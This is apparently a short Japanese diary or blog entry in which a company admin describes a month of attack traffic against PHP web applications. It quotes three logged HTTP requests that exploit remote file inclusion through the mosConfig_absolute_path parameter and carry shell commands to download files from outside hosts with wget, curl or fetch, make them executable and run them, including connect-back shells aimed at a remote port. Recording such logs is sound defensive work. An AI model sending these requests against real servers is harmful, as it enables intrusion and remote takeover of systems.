ここ一ヶ月程、会社では下記のような通信で頭を悩まされる。

GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://xxx.xxx.84.10/heade.gif?&cmd=cd%20/tmp;wget%20xxx.xxx.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo| HTTP/1.1

GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://hogehoge.com/tool.gif?&cmd=cd%20/tmp/:fetch%20http://hogehoge.com/mamb0x.txt:perl%20mamb0x.txt:rm%20-rf%20mamb0x.txt*? HTTP/1.1

GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://xxx.xxx.89/cmd.txt?&cmd=cd%20/tmp;wget%20xxx.xxx.218.183/cback;chmod%20744%20cback;./cback%20xxx.xxx.242.90%208081;wget%20xxx.xxx.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20xxx.xxx.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://xxx.xxx.218.183/cback;chmod%20744%20cback;./cback%20xxx.xxx.242.90%208081;curl%20-o%20dc.txt%20http://xxx.xxx.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20xxx.xxx.242.90%208081;echo%20YYY;echo| HTTP/1.1

※内容は一部改変してあります。

基本は phpファイルに外部ファイルへのアクセス、wgetで不審なファイルのダウンロードと、以前紹介したAWStatsの脆弱性を突いた攻撃より、何歩も進んでいる。この日記では触れなかった(忘れていたとも言う)が、最近はこうしたWebアプリケーションを狙った攻撃が非常に多い。

以下追記予定。